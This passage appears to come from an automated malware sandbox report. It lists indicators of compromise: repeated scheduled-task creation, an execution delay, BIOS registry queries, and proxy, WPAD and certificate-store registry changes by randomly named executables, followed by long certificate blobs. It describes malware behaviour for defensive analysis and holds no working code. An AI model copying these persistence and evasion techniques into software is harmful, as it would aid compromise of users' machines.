schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 328 schtasks.exe 820 schtasks.exe 2892 schtasks.exe 3016 schtasks.exe 2252 schtasks.exe 2532 schtasks.exe 2596 schtasks.exe 2424 schtasks.exe 2616 schtasks.exe 652 schtasks.exe 2152 schtasks.exe 668 schtasks.exe 1140 schtasks.exe 2332 schtasks.exe 264 schtasks.exe 2084 schtasks.exe 960 schtasks.exe 2152 schtasks.exe 2648 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2300 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Pwhrnod.exehVUcgSG.exerundll32.exepowershell.exewscript.exealRnUJb.exepowershell.exesvchost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Pwhrnod.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\WpadDecision = "0" Pwhrnod.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 Pwhrnod.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000006076617a66bfda01 alRnUJb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" alRnUJb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 hVUcgSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Pwhrnod.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\WpadNetworkName = "Network 3" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs hVUcgSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\8e-f4-c8-ba-12-f0 hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" alRnUJb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings hVUcgSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{61992C63-3934-4406-A73E-D8EBB3388EA9}\8e-f4-c8-ba-12-f0 Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Pwhrnod.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0 hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-f4-c8-ba-12-f0\WpadDecisionReason = "1" hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates hVUcgSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root hVUcgSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exerundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings rundll32.exe -
Processes:
setup.exeaj2A10.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde aj2A10.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 aj2A10.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 